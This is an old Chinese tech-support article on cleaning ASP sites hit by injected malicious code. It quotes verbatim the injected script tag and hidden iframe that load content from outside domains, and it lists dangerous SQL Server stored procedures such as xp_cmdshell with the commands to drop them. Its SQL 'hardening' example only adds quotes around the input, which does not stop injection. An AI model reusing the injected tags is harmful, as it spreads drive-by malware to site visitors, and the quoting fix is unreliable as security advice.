域名频道

欢迎您来到域名频道,开始互联网之旅!

ASP网页被插r入恶意代码问题

作者:技术支持来源:域名频道发布时间:2007-5-8 9:54:33浏览:

这问题我遇见过。也在这里发过求救,最后总结是:
这总情况没有什么软件可以帮你修复,必须靠自己一个文件一个文件的是检查,看是不是程序上有漏动,决大多数是程序有漏动。
比如: 在ASP里有这个一段话,
<%
ID=request("ID")
rs.open "select * from tmptabel where id=" & ID
%>
以上这句话非常容易成为入侵者下手的地方,必须加固一下
<%
ID=request("ID")  要设法检查这个值,如不是数值就停用它,
rs.open "select * from tmptabel where id='" & ID & "'"  把这个值有单引号括上
%>
在检查过所有文件确定程序里没有这类SQL写法的漏洞后。接下来就要全部替换掉所有页面里的非法插入的<script type="text/javascript" src="http://www.mitaodd.com/ceshi/ok.js"></script>
<iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
这个东东,(可以用Macromedia Dreamweaver这类软件对网站文件进行检查),或将内部的网站把服务器上的全部复盖,确定全部删除后,接下来就该在网站内仔细查看有没有不是你的文件夹或文件,删除它,不能留情,这一部是很重要的(包括隐藏文件)。再就检查服务器内有没有可疑的执行文件,一般都在根目录下,最好都看看,有就删别留情。
最后是屏闭掉SQL的一个危险存储过程,如:
/*********************************************************************
以下列出的都是危险的内置存储过程,全在我们封杀之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite

sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop

sp_makewebtask


/*********************************************************************
以下为屏蔽上面所说的危险内置存储过程
sp_dropextendedproc 'xp_cmdshell'
go
sp_dropextendedproc 'xp_regaddmultistring'
go
sp_dropextendedproc 'xp_regdeletekey'
go
sp_dropextendedproc 'xp_regdeletevalue'
go
sp_dropextendedproc 'xp_regenumkeys'
go
sp_dropextendedproc 'xp_regenumvalues'
go
sp_dropextendedproc 'xp_regread'
go
sp_dropextendedproc 'xp_regremovemultistring'
go
sp_dropextendedproc 'xp_regwrite'
go
sp_dropextendedproc 'sp_OACreate'
go
sp_dropextendedproc 'sp_OADestroy'
go
sp_dropextendedproc 'sp_OAMethod'
go
sp_dropextendedproc 'sp_OAGetProperty'
go
sp_dropextendedproc 'sp_OASetProperty'
go
sp_dropextendedproc 'sp_OAGetErrorInfo'
go
sp_dropextendedproc 'sp_OAStop'
go

drop procedure sp_makewebtask


 

收藏 】 【 打印